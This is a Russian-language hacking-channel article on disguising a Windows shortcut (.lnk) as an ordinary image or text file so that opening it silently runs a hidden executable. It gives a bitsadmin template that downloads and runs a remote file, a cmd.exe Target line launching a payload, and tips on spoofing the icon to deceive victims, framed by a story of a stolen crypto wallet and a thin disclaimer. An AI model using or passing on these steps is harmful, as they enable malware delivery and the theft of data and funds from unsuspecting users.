February 22, 2023

Полезная нагрузка в любом файле

ДИСКЛЕЙМЕР
Информация предоставлена в ознакомительном характере. Мы не несём ответственности за ваши действия. Этой статьей мы хотим предупредить вас об уязвимости, которая может использоваться против Вас. Все истории вымышлены, совпадения с людьми случайны. И вообще, это написано новой разработкой США:)


Вступление

Всех приветствую на канале "Библия Хакера"! В данной статье речь пойдёт об одном из нескольких методов внедрить полезную нагрузку в файл любого расширения. При правильном подходе даже опытный юзер не найдёт подвоха и запустит наш файл не зная, что его данные через секунду посетят наш сервер.
Недавно мне написал подписчик, который был в лёгком шоке, его смогли взломать через обычный ".jpg" файл. При анализе материала я заметил старую уязвимость, которую изучал ещё в юные годы. Меня сильно удивило что информации о ней на русском не было. Неужели рунет не знаком с этим?
Приятного чтения, эта статья сильно расширит ваш кругозор!

Как выглядит зараженный файл?

Для наглядности я записал короткое видео, где показал что у меня включены расширения файлов. Как вы уже поняли, "Exploit.txt" заражён. Он выглядит как обычный текстовый документ, на компьютере жертвы не будет отличий. В этом файле спрятана полезная нагрузка, которая открывает файл по указанному пути. Вся его суть завязана на расширении ".lnk", которое Windows не отображает. Такой файл антивирус не удалит при скантайме, мы научимся создавать команду, которая активирует нашу полезную нагрузку с любого места на устройстве.

Как на это попался подписчик?

По его словам, он занимается криптоотработкой. В логе компьютера он обнаружил холодный кошелёк, баланс которого превышал 13k$. При попытке открыть скриншот экрана с расширением ".jpg", он попросту не открылся. Полная маскировка, файл не подавал признаков ненастоящего. Спустя несколько минут его криптокошелёк был похищен, ушла огромная сумма денег на адрес злоумышленника. Огромные потери и недопонимание, как он, будучи опытным пользователем смог скачать вирус? Пример такого файла изучите ниже.

Принцип работы

Как я и упомянул выше, ярлыки не показывают свой тип. Мы бы не смогли использовать ".exe", так как он отображает свое окончание при включенном пункте в "Параметрах папок". Основной принцип работы: запуск файла из указанной директории. Да, можно внедрить загрузку файла прямо с сервера, но вариант сам по себе не очень. Причина: полный детект антивирусов. Даже при чистом стабе загрузка не начнётся, антивирус моментально удалит ярлык.
В образовательном формате оставляю пример, изучите после следующего пункта.

C:\Windows\System32\cmd.exe /k C:\Windows\System32\bitsadmin.exe /transfer {любое имя} {прямая ссылка на файл} C:\{директория для сохранения} /k {прямой путь к скачанному файлу} - Принцип работы загрузки & запуска.

Создание эксплоита

Для начала нам нужно определить папку в которой все будет происходить. Я же буду делать аналогию того, на что наткнулся подписчик. По пути
/FileGrabber/Users/Admin/Desktop/Trash/Work
я поместил файл с названием "HACK2DAY.exe", который и будет выполняться после открытия ярлыка. Вы также можете поместить его вглубь, туда, куда никто и заходить не станет. После этого создаем ярлык на этот файл.

Переносим его в основную "лицевую" папку и называем как душе угодно, указав расширение. У меня это будет "Screenshot.jpg". Но вот незадача, как он будет работать на другом устройстве? Ведь путь простроен по локальным данным в которых курирует имя компьютера, диск на котором хранится папка и прочие загвоздки. Все просто, мы будем обращаться к командной строке для установления текущего пути, что и сделает наш ярлык "портативным" под любое устройство. Для этого открываем свойства ярлыка и в строку "Start in" вписываем "%currentdir%". Чтобы открыть наш ".exe" также без командной строки не обойтись. В "Target" вводим следующий код, изменяя его под свой файл:

%windir%\system32\cmd.exe /c FileGrabber\\Users\\Admin..\\HACK2DAY.exe

[ УЧТИТЕ, НУЖНО ИСПОЛЬЗОВАТЬ "\\" ПО ДРУГОМУ НЕ БУДЕТ РАБОТАТЬ ] По итогу мы должны достигнуть такой картины как на скриншоте:

В этом меню можно и замаскировать иконку вашего ярлыка на ту, которую имеет настоящий файл. Для этого нажимаем "Change Icon" и ищем подходящую. Если у вас не будет выбора, в окне введите несуществующий путь к файлу и оно выдаст ошибку, тем самым предложит выбрать из системных. Так как у меня маскировка под ".jpg" я выбрал соответствующую. По итогу я получил файл, который является копией обычного изображения. Отличить такое можно только по маленькой "стрелочке", которая создается в левом нижнем углу иконки.

Проверяем итог работы

После запуска у нас активируется наша полезная нагрузка, пример на видео:


НАШ КАНАЛ: t.me/hack2day

НАШ КАНАЛ: t.me/hack2day

НАШ КАНАЛ: t.me/hack2day